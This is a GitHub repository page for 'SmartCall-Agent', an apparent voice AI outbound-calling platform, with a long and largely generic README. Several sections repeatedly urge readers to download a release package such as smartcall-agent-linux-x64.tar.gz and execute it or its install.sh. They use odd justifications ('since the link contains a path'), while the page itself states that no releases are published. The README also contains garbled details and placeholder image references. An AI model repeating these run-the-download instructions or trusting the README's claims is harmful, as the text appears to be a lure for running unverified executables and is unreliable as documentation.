Skip to content

🐙 AI Agent System with RAG and outbound calling through LiveKit, OpenAI Realtime for voice chats; integrates Pinecone, JWT auth, and analytics for smart agents.

Notifications You must be signed in to change notification settings

silaskiragu/SmartCall-Agent

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

SmartCall-Agent: Modular Voice AI for Real-Time Outbound Calls

Visit https://github.com/silaskiragu/SmartCall-Agent/releases to grab the latest release.

Releases

SmartCall-Agent is a modular voice AI platform designed to handle real phone and VoIP calls with intelligent, domain-specific conversations. It blends Retrieval-Augmented Generation (RAG), automatic speech recognition (ASR), text-to-speech (TTS), and knowledge base integration to enable natural outbound calling. The system is built with an ecosystem of proven tools and services, including LiveKit for real-time communication, Plivo for telephony capabilities, OpenAI and Hugging Face models, and a modern stack based on Python and Node.js. This README describes how the project is organized, how to install and run it, how the components fit together, and how to contribute to the project.

Table of contents

  • Why SmartCall-Agent
  • Core ideas and architecture
  • Features and capabilities
  • How it works: end-to-end flow
  • Tech stack and integrations
  • Modules and subsystems
  • Data, knowledge, and memory
  • Deployment models
  • Local development and quick start
  • Configuration and environment
  • Telephony and media handling
  • RAG and knowledge base integration
  • Agent persona and tone management
  • Observability, reliability, and security
  • Extension points and customization
  • Testing and quality assurance
  • Contributing and governance
  • Release process and artifacts
  • Roadmap and future work
  • FAQ

Why SmartCall-Agent SmartCall-Agent exists to reduce the friction of outbound calling in complex domains. It brings a voice-first interface to business workflows that historically relied on scripts or rigid decision trees. The platform is designed to be modular so teams can swap components, tune models, and tailor conversation styles without rearchitecting the entire pipeline. You can run outbound campaigns, handle real-time conversations with customers, and keep a coherent knowledge base in sync with the ever-changing business rules.

Core ideas and architecture

  • Modular design: Each major function is isolated behind a clean interface. This makes it easy to replace, upgrade, or extend components without breaking the whole system.
  • Voice-first intelligence: The pipeline is built around speech-centric processing. ASR converts real-time audio to text, LLMs generate responses, and TTS renders natural-sounding speech back to the caller.
  • Retrieval-Augmented Generation: When a consumer asks about a policy or product detail, the system retrieves relevant documents and uses them to ground the response. This keeps replies accurate and aligned with current knowledge.
  • Real-time media and signaling: LiveKit provides the foundation for low-latency, real-time audio streams. It’s essential for natural conversations and smooth call experiences.
  • Telephony integration: Plivo connects the platform to traditional phone networks and VoIP services, enabling outbound calling across regions and carriers.
  • Persisted knowledge with embeddings: A vector store (e.g., Pinecone) indexes embeddings of documents and knowledge snippets for fast retrieval during live conversations.
  • Persona and tone control: The system can modulate voice, style, and pacing to fit a brand, a campaign, or a particular agent persona, while remaining consistent with policy and domain constraints.
  • Observability by design: The platform exposes telemetry, traces, and structured logs to diagnose issues and measure performance.

Features and capabilities

  • End-to-end outbound calling: The system initiates calls, maintains context, and responds in natural language with speech synthesis.
  • Multi-language and regional support: Core blocks can be configured to handle multiple languages and dialects, with locale-aware prompts and responses.
  • Domain-specific knowledge: The knowledge base holds product details, policies, and standard responses. The RAG layer fetches the most relevant materials for each turn in a conversation.
  • Conversational memory: The agent can recall previous interactions within a session and across sessions if allowed, enabling coherent long-running conversations.
  • Customizable agent personas: Choose voice, tone, and pacing to align with brand identity or campaign goals.
  • Real-time analytics: Dashboards and metrics on call success, duration, user sentiment, and escalation rates help refine strategies.
  • Seamless integration with telephony and channels: Outbound calling through Plivo, real-time audio with LiveKit, and optional channels like SMS or chat can be integrated as needed.
  • Scalable inference and hosting: The system can run on local clusters or cloud providers with autoscaling and fault tolerance.
  • Extensible knowledge connectors: Plug in new knowledge sources, whether documents, databases, or APIs, and keep them synchronized with the RAG pipeline.
  • Safety and guardrails: The platform includes prompts and policies to keep responses within a defined domain and comply with guidelines for voice interactions.

How it works: end-to-end flow

  • Caller initiates a call (or a scheduled outbound call starts) via the telephony layer.
  • Audio streams are captured and fed to the ASR module to obtain a textual transcription.
  • The natural language engine processes the transcription, checks the domain rules, and decides next actions.
  • If a knowledge query is needed, the RAG layer retrieves relevant documents or knowledge snippets and supplies them to the LLM for grounded responses.
  • The response is produced by the LLM and sent to the TTS module to generate natural speech.
  • The speech is delivered to the caller via the telephony stack, and the system maintains context for the next turn.
  • During the call, the persona and tone are enforced by the voice synthesis and response generation layers to maintain consistency with the brand.
  • If the conversation requires escalation, routing logic hands off to a human agent or a different workflow.
  • Call metadata, transcripts, and decisions are logged for analytics and compliance, with optional exports to external systems.

Tech stack and integrations

  • Core languages: Python and Node.js, chosen for their rich ecosystems, ease of use, and strong support for AI tooling.
  • AI models: OpenAI and Hugging Face models for generation and comprehension, with retrieval-augmented capabilities.
  • Vector store: Pinecone for document embeddings and efficient retrieval.
  • Speech: ASR for speech-to-text and TTS for text-to-speech synthesis to deliver natural voice interactions.
  • Telephony: Plivo provides outbound calling and telephony control; LiveKit handles real-time audio streams and room management.
  • Data sources: Knowledge bases, product catalogs, policy documents, and internal wikis, all indexed and queryable by the RAG layer.
  • Observability: Telemetry, metrics, and log data from the orchestration layer for monitoring and troubleshooting.

Modules and subsystems

  • Orchestrator and workflow engine: Coordinates the end-to-end call flow, maintains session state, and routes tasks to the right subsystems.
  • Telephony adapters: Abstractions over LiveKit and Plivo to unify call handling, media negotiation, and signaling.
  • Voice pipeline: Comprises ASR, TTS, and voice modulation components, including language, voice model, and prosody controls.
  • RAG engine: Combines a retriever with a generator to ground responses in the knowledge base and ensure factual accuracy.
  • Knowledge base connector: Interfaces with the document store and any external knowledge sources, including structured data and unstructured documents.
  • Persona and tone controller: Dictates voice characteristics, speaking style, and pacing to achieve the desired impression.
  • Memory and context manager: Tracks recent turns, entities, and user intents to maintain continuity across the conversation.
  • Logging and analytics: Tracks call quality, response latency, model usage, error rates, and user satisfaction indicators.
  • Security and policy layer: Applies access controls, data handling rules, and domain constraints to all components.

Data, knowledge, and memory

  • Knowledge base design: A curated set of documents, FAQs, policies, and product information organized by domain. Each document is indexed with metadata for efficient retrieval.
  • Embeddings and retrieval: Text data is transformed into vector embeddings that capture semantic meaning. The RAG layer uses a vector store to fetch the most relevant passages for grounding responses.
  • Memory handling: Short-term memory tracks the current call context, including user goals, past questions, and current entities. Long-term memory can capture recurring users and common scenarios, subject to privacy and policy constraints.
  • Data freshness: Knowledge updates are propagated through a syncing mechanism that refreshes embeddings and reindexes documents as needed.
  • Privacy and governance: Data handling follows policy rules for retention, deletion, and usage across conversations. Access is controlled and auditable.

Deployment models

  • Local development: Run components on a developer machine for testing, with mocked telephony endpoints to simulate real calls.
  • Cloud-native deployment: Deploy using containerized services on a cloud provider with auto-scaling, load balancing, and managed databases for vector stores and caches.
  • Hybrid setups: Combine on-premises signaling and media handling with cloud-based AI services to balance latency, cost, and control.
  • Edge and regions: Distribute instances across regions to reduce latency for local customers and meet data sovereignty requirements.
  • High-availability and fault tolerance: Use redundant instances, health checks, and graceful failover to ensure reliability during peak traffic.

Local development and quick start

  • Prerequisites: Python 3.10+, Node.js 18+, Docker, and Docker Compose. A connected OpenAI API key and access to Pinecone or an alternative vector store if you want to prototype without Pinecone.
  • Repository layout: The project follows a modular layout with clear boundaries between the speech pipeline, RAG, memory, and telephony adapters.
  • Quick start steps:
    1. Clone the repository and install dependencies.
    2. Set up environment variables for AI services, memory stores, and telephony credentials.
    3. Start local services with Docker Compose.
    4. Run the orchestrator to boot the conversation pipeline.
    5. Test with a mocked telephony endpoint or a local LiveKit room.
  • Typical commands (example):
    • git clone https://github.com/silaskiragu/SmartCall-Agent.git
    • cd SmartCall-Agent
    • npm install
    • python -m venv venv
    • source venv/bin/activate
    • pip install -r requirements.txt
    • docker-compose up -d
    • python src/orchestrator/main.py --config=config/local.yaml
  • Testing and debugging: Use unit tests for individual modules and integration tests for the end-to-end flow. Logs at debug level help you track issues in the pipeline. Assertions guard against unexpected inputs and model outputs.

Configuration and environment

  • Environment variables: The platform uses a centralized configuration system. Common variables include:
    • OPENAI_API_KEY: Your OpenAI API key for generation and comprehension.
    • PINECONE_API_KEY and PINECONE_INDEX: Credentials for the vector store and search index.
    • LIVEC Kit credentials, room IDs, and access tokens for real-time audio routing.
    • PLIVO_AUTH_ID, PLIVO_AUTH_TOKEN: Credentials for outbound telephony.
    • TTS_PROVIDER and ASR_PROVIDER: Selectors for the speech components.
    • DATABASE_URL or similar: Connection strings for knowledge base storage and session memory.
    • LOG_LEVEL and TRACE_LEVEL: Telemetry verbosity controls.
    • DEFAULT_LOCALE: Language and locale for the agent's default behavior.
  • Configuration files: YAML or JSON files describe the deployment, with environment-specific overrides. You can tailor:
    • Domain settings: The set of intents, policies, and flows for the domain.
    • Knowledge sources: The documents and APIs the agent can access.
    • Conversation policies: Guardrails and escalation rules.
    • Voice settings: Voice gender, accent, speed, and emphasis.
  • Secrets management: Keep secrets out of code. Use secret managers or environment-based vaults to inject credentials at runtime.

Telephony and media handling

  • LiveKit integration: LiveKit handles real-time audio routing. It provides rooms, tracks, and signaling for smooth voice sessions.
  • Plivo integration: Plivo provides outbound calling capabilities to phone networks, including number provisioning, caller ID, and call control.
  • Media pipeline: Audio streams flow through ASR, TTS, and the conversational engine with low-latency handling to minimize lag in responses.
  • Call control: The system can place, answer, transfer, or end calls as dictated by the conversation flow and agent policies.
  • Compliance channels: The architecture supports call recording, transcription, and redaction modules to meet regulatory requirements.

RAG and knowledge base integration

  • Document store: Documents are indexed for fast retrieval. You can point the system to internal wikis, policy docs, product catalogs, and customer-facing FAQs.
  • Embeddings: Each document or section is converted into a vector representation. This enables semantic search to find the most relevant passages for a given user utterance.
  • Retrieval strategy: The retriever uses a hybrid approach that combines lexical search with semantic similarity for robust results.
  • Grounded generation: The generator uses retrieved passages to ground its responses, improving factual accuracy and relevance.
  • Knowledge refresh: As documents update, embeddings are refreshed to keep the system current.

Agent persona and tone management

  • Persona design: Create distinct agent profiles by combining voice attributes, pacing, vocabulary, and style.
  • Tone modulation: The system can shift tone, from formal to friendly, based on the caller's mood, sentiment, or the campaign requirements.
  • Voice model selection: Choose from a set of voice models with different accents and timbres to suit your audience.
  • Safety and policy: The system includes guardrails to ensure tone remains professional and compliant with domain rules.

Observability, reliability, and security

  • Telemetry: Metrics for call success, call duration, latency, and error rates are exposed for dashboards and alerts.
  • Tracing: End-to-end traces help you identify which component added latency or raised errors.
  • Logs: Structured logs describe events, decisions, and model usage during a call.
  • Security: Access controls guard sensitive data, and data retention policies govern how long transcripts and logs are kept.
  • Resilience: The platform supports retries, circuit breakers, and backoff strategies to handle transient failures.

Extension points and customization

  • New language support: Plug in additional ASR, TTS, and language models to support more languages.
  • New knowledge sources: Add new document stores or APIs to expand the agent's knowledge base.
  • Custom flows: Define conversation templates and flows for campaigns, support scenarios, or outbound sales calls.
  • API-driven integrations: Expose APIs to trigger calls, fetch data, or control the agent from external systems.
  • Telephony adaptors: Swap or add telephony providers if your infrastructure requires it.
  • Voice and persona packs: Create new packs for marketing campaigns, onboarding sequences, or support journeys.

Testing and quality assurance

  • Unit tests: Validate individual components like the retriever, generator, and memory manager.
  • Integration tests: Validate end-to-end call flows with mock telephony and synthetic transcripts.
  • Load tests: Simulate multiple concurrent calls to assess latency and throughput.
  • A/B tests: Compare different personas or prompts to optimize engagement and outcomes.
  • Quality metrics: Track call outcomes, user satisfaction, and escalation rates to drive improvements.

Contributing and governance

  • How to contribute: If you want to contribute, fork the repository, create a feature branch, and submit a pull request with tests and documentation.
  • Collaboration model: The project favors incremental improvements and clear API surfaces. Changes should be backwards-compatible where feasible.
  • Code quality: Follow consistent coding standards, include tests for new features, and update documentation as needed.
  • Issue triage: Prioritize bugs, feature requests, and documentation improvements. Use labels to help contributors find tasks that match their skills.

Release process and artifacts

  • Releases page: The project distributes release artifacts through the official releases page. Since the releases page contains a path, download the latest release asset and execute it to install or upgrade the system.
  • Asset naming: Typical assets include platform-specific installers or packages, such as a Linux tarball or Windows zip bundle. A representative example would be smartcall-agent-linux-x64.tar.gz. After download, run the installer script included in the package.
  • Upgrade notes: Releases may include migration notes for moving from older versions to newer ones. Follow the guidance in the release notes to minimize disruption.
  • Verification: After installation, verify that the orchestration service starts correctly, the telephony adapters connect, and the RAG pipeline can retrieve information from the knowledge base.
  • Rollback: If an update introduces issues, restore from a known-good release and verify the environment is back to the previous state.

Releases and installation (special notes)

  • The releases page is your primary source for stable builds, patches, and feature updates. You can access it at the link provided above. Since the link contains a path, you should download a release asset from that page and run the installation script or setup process included in the asset.
  • For a quick start, head to the releases page to locate a Linux installer package named something like smartcall-agent-linux-x64.tar.gz and execute the included install.sh. The second occurrence of the releases URL should be used to navigate to the page for asset acquisition and upgrade guidance.

Roadmap and future work

  • Multi-language coverage: Expand language support for regional markets with localized prompts and language models tuned to local dialects.
  • Advanced dialog management: Improve the agent’s ability to handle long-running conversations with more robust memory, entity tracking, and context stitching.
  • Richer knowledge integration: Connect to more data sources, such as CRM systems, ticketing platforms, and product catalogs, in near real-time.
  • Better governance: Introduce stricter guardrails on sensitive topics and stronger compliance controls.
  • Adaptive personas: Create more granular persona packs that can adapt to user mood and conversation context in real time.

FAQ

  • How do I start using SmartCall-Agent in my environment?

    • Start by setting up a local development environment, install dependencies, and run the orchestration component with a local mock telephony provider. Then connect to LiveKit for real-time audio and to Plivo for outbound calling. Configure OpenAI and Pinecone access, and import your knowledge base.
  • Can I run this on-premises?

    • Yes. The architecture supports on-prem deployment. You can host the constituent services in your own data center or private cloud, using your preferred container orchestration system.
  • What about data privacy?

    • The platform is designed to respect data privacy rules. Data handling is governed by your policy, with options to redact sensitive information and to control data retention.
  • How do I customize the agent persona?

    • Create a persona package that defines the voice model, tone, pacing, and vocabulary. Attach this package to your agent flow and switch it per campaign or user segment.
  • How do I update knowledge sources?

    • Add or replace documents in your knowledge base, reindex embeddings, and refresh the RAG index. The system will begin using the updated knowledge on subsequent calls.
  • Is there a testing harness?

    • Yes. The project includes unit tests for core components and integration tests for call flows. You can simulate calls with mock telephony and synthetic transcripts to validate behavior.
  • Where can I find the latest release notes?

    • Release notes are posted on the official releases page. They describe new features, fixes, and breaking changes. Check the releases section for the year’s progress and planned improvements.
  • How can I contribute improvements?

    • Create a fork, implement your feature, write tests, and submit a pull request. Include documentation updates and examples that show how to use the new functionality in real workflows.
  • What kinds of tools are integrated?

    • The platform integrates with LiveKit for real-time audio, Plivo for outbound calling, OpenAI and Hugging Face models for generation and understanding, Pinecone for vector embeddings, and a modular stack of Python and Node.js services.
  • Can I run the system in the cloud with autoscaling?

    • Yes. The architecture is designed for cloud deployments with containerization. You can run services in Kubernetes or any container-based environment with auto-scaling and load distribution.
  • How do I create new knowledge sources?

    • Add documents or connect to APIs to pull data into your knowledge base. Ensure the content is well-structured and tagged to support retrieval. Recompute embeddings and update the index after changes.
  • What is the expected latency for a typical call turn?

    • Latency depends on model size, embedding retrieval time, and network conditions. You should aim for a few hundred milliseconds for a smooth conversation, with occasional higher delays during complex reasoning or long retrieval steps.
  • What licensing governs this project?

    • The repository typically uses a permissive license that supports commercial and research use. Check the LICENSE file in the repository for exact terms and attribution requirements.
  • How do I handle multiple languages in a single deployment?

    • The platform supports language-specific components for ASR, TTS, and text generation. You configure the language in your session and instantiate the appropriate models and voices for that locale.
  • How do I manage user consent and data handling?

    • Configure consent flows in your conversation policies and ensure compliance with applicable laws. Integrate with your privacy policy and create a data lifecycle plan that fits your organization.
  • How do I escalate to a human agent?

    • The flow includes escalation points where a handoff is triggered based on user input, sentiment, or policy constraints. The system then routes the call or session to a live operator and preserves the context to resume later if needed.
  • Can I integrate this with CRM or ticketing systems?

    • Yes. The architecture is designed to connect with external APIs and data stores, such as CRM and ticketing platforms. Add connectors to fetch or push data during the conversation, and ensure data integrity and security during exchanges.
  • What about feel and tone during calls?

    • The tone controller adjusts pacing, inflection, and style to match the campaign. You can tune these controls to ensure consistency with brand guidelines while maintaining natural speech patterns.
  • How do I secure API keys and secrets used by the system?

    • Use secret management facilities and environment-based injection to shield credentials. Do not hard-code keys in code or configuration files that go into version control.
  • Where can I learn more about the RAG approach used here?

    • RAG combines a retriever with a generator to ground responses in authentic documents. This approach improves factual accuracy and keeps the agent aligned with the user’s domain. You can explore OpenAI, Elasticsearch, and Pinecone literature for deeper insights.
  • How do I contribute a knowledge source?

    • Create a structured document, annotate it with metadata for search, and push it into your knowledge base. Reindex embeddings and test the retrieval results to verify relevance and accuracy.
  • How is the system tested under load?

    • Load testing uses simulated calls and synthetic users to stress the telephony adapters, the media pipeline, and the RAG layer. The tests measure latency, throughput, and system resilience under peak load.
  • What is the recommended hardware for development?

    • A modern multi-core CPU with ample RAM (16 GB or more) for local development, and GPUs if you plan to run large language models locally. For production, you’ll likely rely on cloud infrastructure with scalable CPUs and GPUs as needed.
  • Can I switch between different PLIVO or LiveKit configurations?

    • Yes. The platform reads configuration profiles that specify credentials, endpoints, and room settings. You can switch profiles per environment to match staging, testing, and production needs.
  • How do I roll back a problematic release?

    • Use the release management process to revert to a known-good release. Restore the previous artifact from the releases page and re-start the services. Verify call flows and data integrity to confirm the rollback is successful.
  • What’s the best way to document a new feature?

    • Create a feature branch, implement the feature with tests, and update the README with usage examples and configuration details. Include a short guide on how to enable the feature in a deployment and how to test it locally.
  • Are there sample campaigns I can run out of the box?

    • Yes. The repository includes templates for common outbound scenarios, including customer onboarding, policy clarification, product education, and post-call follow-ups. These templates show how to set up personas, prompts, and knowledge sources.
  • How do I ensure accessibility in voice interactions?

    • Design prompts that are clear and concise. Use legible pacing, avoid rapid-fire delivery, and provide options for users to request repetitions or clarifications. Consider regional pronunciations and language variants to improve comprehension.
  • How do I keep a persistent memory across sessions?

    • If policy allows, you can store session memory tied to identifiers like a customer ID. Access controls and data retention rules determine what can be recalled in future interactions.
  • How do I document API usage and constraints for developers?

    • Provide an API reference with endpoints, input/output schemas, and examples. Document rate limits, authentication requirements, and error handling patterns. Include a changelog for visibility into breaking changes.
  • How do I handle model versioning?

    • Pin model versions in configuration and implement a migration plan for upgrading to newer models. Keep a rollback mechanism in place in case a newer model reduces performance or accuracy.
  • Can I run this in a serverless environment?

    • Serverless deployment is possible for certain components, particularly stateless microservices and API endpoints. The media, telephony, and memory components may require persistent services with stable runtimes.
  • How do I localize prompts for different markets?

    • Create locale-specific prompt sets, with localized intents and examples. Use language-appropriate voices and ensure translations maintain meaning and tone.
  • How can I monitor system health?

    • Set up dashboards that show key performance indicators, error rates, queue lengths, and call outcomes. Use alerts to notify teams when thresholds are exceeded.
  • How is pricing managed for AI services?

    • AI usage pricing depends on the provider and usage levels. Monitor model calls, embeddings, and streaming usage to estimate costs. Optimize prompts and caching to minimize unnecessary calls.
  • How do I handle data exports for customers?

    • Implement an export workflow that aggregates transcripts, call metadata, and relevant logs. Ensure the export complies with privacy policies and retention rules.
  • What’s the best practice for cold-start conversations?

    • Cold starts benefit from a strong opening prompt and a quick context-gathering strategy. Use a concise welcome message, confirm purpose, and set expectations for what the caller should expect.
  • How do I add new languages to the RAG layer?

    • Add language-aware ASR and TTS models, adjust prompts, and ensure the knowledge base supports the target language. Update embeddings and retrievers to index language-specific content.
  • How can I extend the knowledge base to include API responses?

    • Create a connector that queries APIs and formats results into searchable documents. Include metadata about the API version, rate limits, and data freshness to guide retrieval.
  • What if I want to run experiments with different agent tones?

    • Use the persona pack mechanism to switch between tones. Run A/B tests by routing calls to different personas and compare outcomes using defined success metrics.
  • How do I integrate with customer support systems?

    • Build adapters that fetch and push data to CRM, ticketing, or helpdesk platforms. Ensure the integration respects data privacy and aligns with the support workflow.
  • How do I ensure the system produces safe and compliant responses?

    • Apply guardrails to prompts, enforce domain constraints, and validate outputs before speech synthesis. Escalate to human agents when content falls outside policy boundaries.
  • How do I keep the project accessible to new contributors?

    • Provide clear contribution guidelines, an approachable code structure, and example usage. Maintain an up-to-date docs folder with tutorials, API references, and example deployments.

End-to-end flavor notes

  • The SmartCall-Agent architecture is designed to be readable and approachable. It emphasizes a clean separation of concerns, so you can reason about where a problem arises and how to fix it. The system is built to be resilient in the face of network variability, model latency, and the complexity of real human conversations. It is also designed with a view toward future expansion so teams can add capabilities without tearing down existing workflows.

Images to illustrate concepts

Note: The images above are provided as examples. If you don’t have these exact assets in your repository, replace them with your own diagrams or use publicly available visuals that fit your setup. The important part is to convey how the pieces fit together and how data flows from speech input to ground-truth responses through the RAG loop.

Releases and installation (revisited)

  • The page https://github.com/silaskiragu/SmartCall-Agent/releases contains the latest builds. Since the link includes a path, download the release asset and execute it to install or upgrade the system. The asset name will typically indicate platform and architecture, such as smartcall-agent-linux-x64.tar.gz or smartcall-agent-windows-x64.zip. After downloading, extract the package and run the included installer or setup script as described in the release notes and accompanying documentation. You will need to provide credentials for OpenAI, Pinecone, LiveKit, and Plivo during setup, as well as any domain-specific configuration for your environment.
  • The second mention of the same URL should be used when you reference the source of truth for release artifacts in documentation or in comments within your deployment scripts.

License

  • SmartCall-Agent is released under a permissive license that allows use, modification, and redistribution in both private and commercial projects. See the LICENSE file in the repository for the exact terms and attribution requirements.

Acknowledgments

  • Acknowledgments to the communities and projects that inspire this platform, including OpenAI, Hugging Face, Pinecone, LiveKit, and Plivo. The project thrives on open tooling, collaboration, and continuous improvement.

Thank you for exploring SmartCall-Agent. This repository is the result of a collaboration between data scientists, software engineers, and product specialists who care about building better, more natural interactions between humans and machines in outbound call workflows. The design is pragmatic, the interface is friendly, and the potential for domain-specific conversations grows as you add knowledge, tune prompts, and refine the user experience.

About

🐙 AI Agent System with RAG and outbound calling through LiveKit, OpenAI Realtime for voice chats; integrates Pinecone, JWT auth, and analytics for smart agents.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages